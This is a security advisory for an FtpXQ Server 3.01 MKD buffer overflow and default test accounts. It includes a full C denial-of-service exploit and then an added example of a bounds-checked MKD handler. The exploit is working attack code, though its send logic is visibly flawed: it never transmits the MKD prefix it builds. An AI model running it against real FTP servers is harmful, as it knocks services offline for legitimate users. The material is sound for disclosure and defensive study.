
FtpXQ Server 3.01 MKD Command Remote Overflow DoS

01 Jul 2014 | Reported by RootType
Source: seebug (www.seebug.org)

FtpXQ Server 3.01 (WinsockQ-based) is affected by multiple remote vulnerabilities: a remote buffer overflow that causes denial of service, and default testing accounts. Exploit code for the denial-of-service issue is included.

Code

source: http://www.securityfocus.com/bid/20721/info

DataWizard FtpXQ Server is prone to multiple remote vulnerabilities:

- A remote denial-of-service issue occurs because the application fails to perform adequate bounds checks on user-supplied data before copying it to an insufficiently sized buffer. An attacker could exploit this issue to crash the application, denying access to legitimate users.

- The application creates two testing accounts by default. An attacker can access these accounts to gain read/write privileges on the server, which could result in the compromise of the affected computer.

FtpXQ Server 3.01 is vulnerable; other versions may also be affected.

/*
* 0xf_ftpxq.c - FTPXQ Denial of service exploit.
* Federico Fazzi <federicoautistici.org>
*
* advisory by Eric Sesterhenn.
* -- Server built using the WinsockQ from DataWizard Technologies. A security
* -- vulnerability in the product allows remote attackers to overflow an
* -- internal buffer by providing an overly long "make directory" request.
*
* r20061025.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

// AAAAAAAAAAAAAAAA..AA*255 in hex format.
char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
         "\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char **argv) {
    int sd;
    socklen_t len;
    struct sockaddr_in saddr;
    struct hostent *he;
    char buf[512], tmpbuf[128];

    if(argc != 5) {
        printf("FTPXQ Server - Denial of service exploit.\n"
               "Federico Fazzi <federicoautistici.org>\n\n"
               "usage: %s <hostname> <port> <user> <password>\n", argv[0]);
        exit(1);
    }

    if((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname()");
        exit(1);
    }

    // init socket
    if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        exit(1);
    }

    // setup struct
    bzero((char *) &saddr, sizeof(saddr));
    saddr.sin_family = AF_INET;
    bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length);
    saddr.sin_port = htons(atoi(argv[2]));

    len = sizeof(struct sockaddr);
    // init connection
    if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
        perror("connect()");
        exit(1);
    }
    printf("FTPXQ Server - Denial of service exploit.\n"
           "Federico Fazzi <federicoautistici.org>\n"
           "---------------------------------------\n");
    puts("connecting..\t\t done");

    // sending a USER data to daemon
    sprintf(buf, "USER %s\r\n", argv[3]);
    write(sd, buf, strlen(buf));
    puts("sending USER data..\t done");

    // sending a PASS data to daemon
    sprintf(buf, "PASS %s\r\n", argv[4]);
    write(sd, buf, strlen(buf));
    puts("sending PASS data..\t done");

    // sending a BOF string with MKD command to host
    sprintf(buf, "MKD %s", bof);
    write(sd, bof, strlen(bof));
    puts("sending MKD bof string.. done");

    // now checking if server is down
    if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
        puts("[!] server doesn't vulnerable");
    else
        puts("[+] server getting down.. done");
    close(sd);

    return(0);
}
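
On the server side, the fix for the first issue is the bounds check the advisory says is missing. The following is an added example, not FtpXQ's code or part of the original advisory: `handle_mkd`, `MAX_PATH_ARG` and the 128-byte buffer size are assumptions chosen for illustration, and the oversize input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PATH_ARG 128  /* assumed size of the server-side path buffer */
enum { FTP_CREATED = 257, FTP_SYNTAX = 500, FTP_BAD_ARG = 501 };

/* Hypothetical handler: validate one raw command line (len bytes, not
 * NUL-terminated) and copy the MKD argument into path only after its
 * length is known to fit. Returns the FTP reply code to send. */
int handle_mkd(const char *line, size_t len, char path[MAX_PATH_ARG])
{
    /* Only a complete, CRLF-terminated "MKD <arg>" line is processed. */
    if (len < 6 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return FTP_SYNTAX;
    if (memcmp(line, "MKD ", 4) != 0)
        return FTP_SYNTAX;

    const char *arg = line + 4;
    size_t arg_len = len - 6;              /* minus verb+space and CRLF */

    /* The missing bounds check: reject oversize input, never truncate. */
    if (arg_len == 0 || arg_len >= MAX_PATH_ARG)
        return FTP_BAD_ARG;
    /* Control bytes (incl. NUL) would confuse later C-string handling. */
    for (size_t i = 0; i < arg_len; i++)
        if ((unsigned char)arg[i] < 0x20 || arg[i] == 0x7f)
            return FTP_BAD_ARG;

    memcpy(path, arg, arg_len);            /* arg_len < MAX_PATH_ARG here */
    path[arg_len] = '\0';
    return FTP_CREATED;
}

int main(void)
{
    char path[MAX_PATH_ARG], big[4 + 255 + 2];
    /* Constructed input: a 255-byte argument, the size the PoC uses. */
    memcpy(big, "MKD ", 4);
    memset(big + 4, 'A', 255);
    memcpy(big + 259, "\r\n", 2);

    printf("normal:   %d\n", handle_mkd("MKD uploads\r\n", 13, path));
    printf("oversize: %d\n", handle_mkd(big, sizeof big, path));
    return 0;
}
```

Rejecting with 501 rather than truncating keeps the server from acting on a path the client did not send, and carrying the length explicitly avoids calling `strlen` on network data.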

                              
